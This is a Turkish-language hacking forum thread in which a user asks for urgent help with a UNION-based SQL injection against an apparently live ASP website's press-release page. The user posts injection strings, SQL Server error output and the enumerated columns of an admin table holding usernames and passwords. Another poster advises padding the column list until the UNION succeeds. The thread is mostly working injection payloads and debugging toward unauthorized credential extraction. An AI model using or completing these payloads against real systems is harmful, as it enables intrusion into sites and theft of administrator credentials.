Sql İnjeksiyon Acil Yardım
-
-1 union+select+0,MemberID,3,1+from+Members
tablo adı Members kolan adı MemberID baska bişi yok yukardakı sorguyu yazdıgımda
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/asp/lib/database.asp, line 53
bu hatayı verıyor galiba sorguda bir hata var
sorgunun kullanımı boyle olması lazım ama -1 union+select+0,Bulduğunuz Kolon Adı,3,Kaç Kolon Varsa +from+Bulduğunuz Tablo Adı
ama nerde hatam var bılemıyorum yardım acilinden
-
hacı nie ikişer ikişer açıyon konuları??
-
hacı ilk sefer actım da bir bok bilmiyodum sonra bayagı bir boklar ogrendım hatta ilk konumun cevabını buldum yazıcam bır ara şimdiki sorun daha önemli onuda bulursam yazıcam da burdakı ustalardan yardım gelirse iyi olur
-
Hocam union birleştirdiği sqllerdeki column yani sutun sayılarının aynı ve eşit sayıda olmasını ister...
Sen doğru sütunu bulana kada 0,0,0, die eklemeye devam et...
-
saol rene hocam babam geldi kızıyor aq bagımlı oldum dıye artık yarın yapıcam cok saol yardım icin
-
ben tablo adlalarını cektım tablo adı "tblAdmin" sonra col=1 col=2 dalan derken alayını cıkarıdm
1=lngAdminID
2=strUsername
3=strPassword
4=strName
5=strSurname
6=strEmailAddress bana bu cevabı verdi
7=intAdminlevel
8=blnApproval
sonra ben bu union komutunu kullandım ama hatalı kullanıyorum sanrıım
union+select+0,Bulduğunuz Kolon Adı,3,Kaç Kolon Varsa +from+Bulduğunuz Tablo Adı
sormak istedigim olay "bulundugunuz kolan adı" dan sonra gelen 3 un mantıgı nedır birde söyle bir sorgulama
yaptıgımda """basin_bultenleri.asp?YearID=2003+union+select+0,strUsername,3,8+from+tblAdmin""""
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
bunu verdi sonra sunu yaptıgımda """"basin_bultenleri.asp?YearID=2003+union+select+0,strUsername,3,1,2,3,4+from+tblAdmin""""
bu seferde bunu verdi
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Operand type clash: text is incompatible with int
hocalar cok az kaldı bu inkesiyonda ama takıldım burda işte yardımlarınız için cok tesekkurler